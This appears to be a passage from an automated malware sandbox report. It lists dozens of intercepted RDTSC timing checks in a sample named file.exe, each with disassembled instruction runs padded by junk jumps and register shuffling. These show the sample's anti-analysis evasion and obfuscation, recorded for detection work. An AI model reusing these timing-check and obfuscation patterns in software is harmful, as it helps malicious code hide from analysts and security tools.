                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070866 second address: 507086A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507086A second address: 5070885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070885 second address: 507088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507088A second address: 50708A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD908C4C6EAh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070953 second address: 5070957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070957 second address: 507095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507095D second address: 50709C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD9092ECB30h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD9092ECB30h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edi, 2A3F2150h 0x0000001f pushfd 0x00000020 jmp 00007FD9092ECB39h 0x00000025 add cl, FFFFFFD6h 0x00000028 jmp 00007FD9092ECB31h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50709C9 second address: 50709CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50709CF second address: 50709D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502008D second address: 5020091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020091 second address: 5020097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020097 second address: 50200CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD908C4C6EAh 0x00000008 pop esi 0x00000009 mov cl, dl 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 call 00007FD908C4C6F8h 0x00000015 mov si, F281h 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50200CC second address: 50200E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD9092ECB2Bh 0x0000000f push eax 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50200E4 second address: 50200F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6F0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50200F8 second address: 502016A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov dl, 12h 0x0000000c mov ax, 64C5h 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FD9092ECB30h 0x00000017 push eax 0x00000018 jmp 00007FD9092ECB2Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FD9092ECB36h 0x00000023 mov ebx, dword ptr [ebp+10h] 0x00000026 jmp 00007FD9092ECB30h 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD9092ECB37h 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502016A second address: 5020170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020170 second address: 5020174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020174 second address: 50201FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD908C4C6EFh 0x00000013 jmp 00007FD908C4C6F3h 0x00000018 popfd 0x00000019 mov ch, C7h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD908C4C6ECh 0x00000026 sub ah, 00000008h 0x00000029 jmp 00007FD908C4C6EBh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD908C4C6F8h 0x00000035 jmp 00007FD908C4C6F5h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50201FE second address: 502020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB2Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502020E second address: 5020212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020212 second address: 5020249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c call 00007FD9092ECB2Dh 0x00000011 mov esi, 6A5B9D37h 0x00000016 pop eax 0x00000017 mov dx, 8510h 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD9092ECB2Eh 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020249 second address: 502024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502024D second address: 5020253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020253 second address: 502034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007FD908C4C6F0h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 mov eax, 66F3A9CDh 0x00000019 popad 0x0000001a je 00007FD97AFDAA7Ah 0x00000020 jmp 00007FD908C4C6F4h 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c jmp 00007FD908C4C6F0h 0x00000031 je 00007FD97AFDAA5Fh 0x00000037 jmp 00007FD908C4C6F0h 0x0000003c mov edx, dword ptr [esi+44h] 0x0000003f pushad 0x00000040 mov si, 6B8Dh 0x00000044 call 00007FD908C4C6EAh 0x00000049 pushad 0x0000004a popad 0x0000004b pop eax 0x0000004c popad 0x0000004d or edx, dword ptr [ebp+0Ch] 0x00000050 jmp 00007FD908C4C6F7h 0x00000055 test edx, 61000000h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushfd 0x0000005f jmp 00007FD908C4C6EBh 0x00000064 xor esi, 6F88BD9Eh 0x0000006a jmp 00007FD908C4C6F9h 0x0000006f popfd 0x00000070 pushfd 0x00000071 jmp 00007FD908C4C6F0h 0x00000076 sbb ch, FFFFFF98h 0x00000079 jmp 00007FD908C4C6EBh 0x0000007e popfd 0x0000007f popad 0x00000080 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502034E second address: 5020353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020353 second address: 5020381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 36C8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FD97AFDAA10h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD908C4C6F9h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020381 second address: 5020387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020387 second address: 502039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 6Ch 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502039C second address: 50203A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203A0 second address: 50203A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50203A6 second address: 502040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007FD9092ECB37h 0x0000000b xor eax, 6C15DFCEh 0x00000011 jmp 00007FD9092ECB39h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007FD97B67ADE1h 0x00000020 pushad 0x00000021 mov eax, 5CC1B073h 0x00000026 mov esi, 227CE0CFh 0x0000002b popad 0x0000002c test bl, 00000007h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD9092ECB2Ch 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502040B second address: 502041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010903 second address: 5010927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010927 second address: 501092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501092B second address: 5010931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010931 second address: 501098C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007FD908C4C6ECh 0x0000000b adc si, DDA8h 0x00000010 jmp 00007FD908C4C6EBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD908C4C6EBh 0x00000024 xor eax, 634F3AEEh 0x0000002a jmp 00007FD908C4C6F9h 0x0000002f popfd 0x00000030 mov bx, ax 0x00000033 popad 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501098C second address: 5010992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010992 second address: 5010996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010996 second address: 50109B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD9092ECB2Eh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50109B1 second address: 50109B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50109B7 second address: 50109BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50109BB second address: 50109BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50109BF second address: 5010A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD9092ECB34h 0x00000010 sbb cx, 6FF8h 0x00000015 jmp 00007FD9092ECB2Bh 0x0000001a popfd 0x0000001b pushad 0x0000001c movzx ecx, dx 0x0000001f jmp 00007FD9092ECB2Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp], ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD9092ECB35h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010A1A second address: 5010A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6ECh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010A2A second address: 5010A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FD9092ECB36h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD9092ECB2Eh 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010A63 second address: 5010A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010A75 second address: 5010A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD9092ECB33h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010A94 second address: 5010AF1 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD908C4C6EEh 0x00000010 sub ebx, ebx 0x00000012 jmp 00007FD908C4C6F1h 0x00000017 test esi, esi 0x00000019 pushad 0x0000001a call 00007FD908C4C6ECh 0x0000001f mov edx, esi 0x00000021 pop esi 0x00000022 mov esi, edx 0x00000024 popad 0x00000025 je 00007FD97AFE1F9Fh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FD908C4C6F4h 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010AF1 second address: 5010B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007FD9092ECB2Ah 0x0000000c sbb ax, 82F8h 0x00000011 jmp 00007FD9092ECB2Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD9092ECB2Bh 0x0000002a jmp 00007FD9092ECB33h 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010B43 second address: 5010B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD908C4C6F5h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010B6F second address: 5010B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010B75 second address: 5010B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010B79 second address: 5010BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD97B682348h 0x0000000e jmp 00007FD9092ECB2Fh 0x00000013 test byte ptr [77436968h], 00000002h 0x0000001a pushad 0x0000001b pushad 0x0000001c mov esi, 25846BE1h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010BA6 second address: 5010C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 jne 00007FD97AFE1EEDh 0x0000000f pushad 0x00000010 mov bh, al 0x00000012 popad 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 jmp 00007FD908C4C6F3h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007FD908C4C6F2h 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007FD908C4C6EEh 0x0000002a sub ecx, 0933F138h 0x00000030 jmp 00007FD908C4C6EBh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 pushad 0x00000039 mov si, di 0x0000003c pushad 0x0000003d movsx edx, ax 0x00000040 mov cx, 02B9h 0x00000044 popad 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push edx 0x0000004b pop esi 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010C1F second address: 5010C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007FD9092ECB33h 0x00000014 adc al, FFFFFFBEh 0x00000017 jmp 00007FD9092ECB39h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov eax, 0762BF59h 0x00000027 mov ecx, 0AF6F815h 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D47 second address: 5020D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD908C4C6EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D59 second address: 5020D70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D70 second address: 5020D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD908C4C6F1h 0x0000000a sub al, 00000056h 0x0000000d jmp 00007FD908C4C6F1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020D9C second address: 5020DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020DA2 second address: 5020DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, 277E3A51h 0x00000010 mov cl, 2Ah 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007FD908C4C6F3h 0x00000019 add si, 8B3Eh 0x0000001e jmp 00007FD908C4C6F9h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, cx 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020ADC second address: 5020B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 pushfd 0x00000011 jmp 00007FD9092ECB2Fh 0x00000016 adc si, F51Eh 0x0000001b jmp 00007FD9092ECB39h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020B28 second address: 5020B70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 pushfd 0x00000006 jmp 00007FD908C4C6F8h 0x0000000b add al, 00000048h 0x0000000e jmp 00007FD908C4C6EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD908C4C6F5h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020B70 second address: 5020BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, si 0x00000011 pushfd 0x00000012 jmp 00007FD9092ECB34h 0x00000017 xor esi, 4EF5C238h 0x0000001d jmp 00007FD9092ECB2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BB5 second address: 5020BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BBB second address: 5020BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BBF second address: 5020BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BCE second address: 5020BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A074D second address: 50A0753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0753 second address: 50A0757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0757 second address: 50A07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD908C4C6F4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD908C4C6EDh 0x0000001a adc ax, 66A6h 0x0000001f jmp 00007FD908C4C6F1h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FD908C4C6F0h 0x0000002b jmp 00007FD908C4C6F5h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A07C7 second address: 50A07E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov al, bl 0x00000010 mov eax, 4A52D8BBh 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50907AB second address: 50907B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030115 second address: 5030119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
